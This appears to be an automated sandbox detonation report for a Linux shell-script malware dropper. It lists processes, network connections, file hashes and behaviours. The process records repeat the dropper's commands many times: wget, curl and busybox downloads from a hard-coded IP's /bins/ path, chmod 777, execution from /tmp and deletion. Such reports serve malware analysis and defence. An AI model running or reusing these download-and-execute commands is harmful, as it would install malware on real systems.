[chmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp
[./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/bin/rm
[rm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/usr/bin/wget
[wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/bin/chmod
[chmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2
[./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/bin/rm
[rm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/usr/bin/wget
[wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/bin/chmod
[chmod 777 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3
[./JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/bin/rm
[rm JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/usr/bin/wget
[wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/bin/chmod
[chmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir
[./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/bin/rm
[rm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/usr/bin/wget
[wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/bin/chmod
[chmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C
[./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/bin/rm
[rm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/usr/bin/wget
[wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/bin/chmod
[chmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7
[./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/bin/rm
[rm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/usr/bin/wget
[wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/bin/chmod
[chmod 777 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8
[./tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/bin/rm
[rm tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/usr/bin/wget
[wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/bin/chmod
[chmod 777 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD
[./v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/bin/rm
[rm v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/usr/bin/wget
[wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/bin/chmod
[chmod 777 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d
[./MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/bin/rm
[rm MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/usr/bin/wget
[wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/bin/chmod
[chmod 777 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF
[./PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/bin/rm
[rm PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/usr/bin/wget
[wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/bin/chmod
[chmod 777 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD
[./v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/bin/rm
[rm v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/usr/bin/wget
[wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/bin/chmod
[chmod 777 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d
[./MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/bin/rm
[rm MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/usr/bin/wget
[wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/bin/chmod
[chmod 777 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF
[./PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/bin/rm
[rm PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/usr/bin/wget
[wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/bin/chmod
[chmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP
[./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/bin/rm
[rm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/usr/bin/wget
[wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/bin/chmod
[chmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK
[./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/bin/rm
[rm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/usr/bin/wget
[wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/bin/chmod
[chmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4
[./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/bin/rm
[rm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/usr/bin/wget
[wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/bin/chmod
[chmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir
[./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/bin/rm
[rm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/usr/bin/wget
[wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/bin/chmod
[chmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C
[./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/bin/rm
[rm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/usr/bin/wget
[wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/bin/chmod
[chmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7
[./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/bin/rm
[rm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/usr/bin/wget
[wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/bin/chmod
[chmod 777 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8
[./tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/bin/rm
[rm tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/usr/bin/wget
[wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/bin/chmod
[chmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F
[./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/bin/rm
[rm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/usr/bin/wget
[wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/bin/chmod
[chmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp
[./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/bin/rm
[rm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/usr/bin/wget
[wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/bin/chmod
[chmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2
[./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/bin/rm
[rm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/usr/bin/wget
[wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/bin/chmod
[chmod 777 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3
[./JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/bin/rm
[rm JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.65.91:443 | tcp | |
| US | 151.101.65.91:443 | tcp | |
| GB | 89.187.167.9:443 | tcp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-28 01:06
Reported
2024-10-28 01:09
Platform
debian9-armhf-20240611-en
Max time kernel
13s
Max time network
14s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP | /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP | N/A |
| N/A | /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK | /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK | N/A |
| N/A | /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 | /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 | N/A |
| N/A | /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F | /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F | N/A |
| N/A | /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp | /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp | N/A |
| N/A | /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 | /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 | N/A |
| N/A | /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 | /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 | N/A |
| N/A | /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir | /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir | N/A |
| N/A | /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C | /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C | N/A |
| N/A | /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 | /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP | /usr/bin/curl | N/A |
Processes
/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh
[/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/bin/chmod
[chmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP
[./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/bin/rm
[rm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/usr/bin/wget
[wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
